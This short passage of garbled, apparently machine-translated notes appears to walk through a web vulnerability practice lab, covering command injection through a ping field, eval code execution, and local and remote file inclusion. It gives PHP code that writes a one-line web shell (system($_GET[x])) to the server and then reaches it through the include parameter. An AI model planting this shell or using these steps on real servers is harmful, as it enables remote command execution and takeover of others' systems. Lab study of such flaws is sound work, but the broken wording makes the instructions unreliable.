RCE
exec ping
Enter the ip address
Followed by a ipconfig
exec “eval”
There is not a direct write command, but with the function name on it, enter phpinfo () on the line
file
Local file
Therefore, the use of switching method of switching to a different directory php file
file (remote)
These two parameters need to be changed prior to testing On
Then the following code to create a txt file
<?php
$myfile = fopen("yijuhua.php", "w");
$txt = '<?php system($_GET[x]);?>';
fwrite($myfile, $txt);
fclose($myfile);
?>
Then the back of the filename parameter to the file path where you are
After the server will appear file you just created
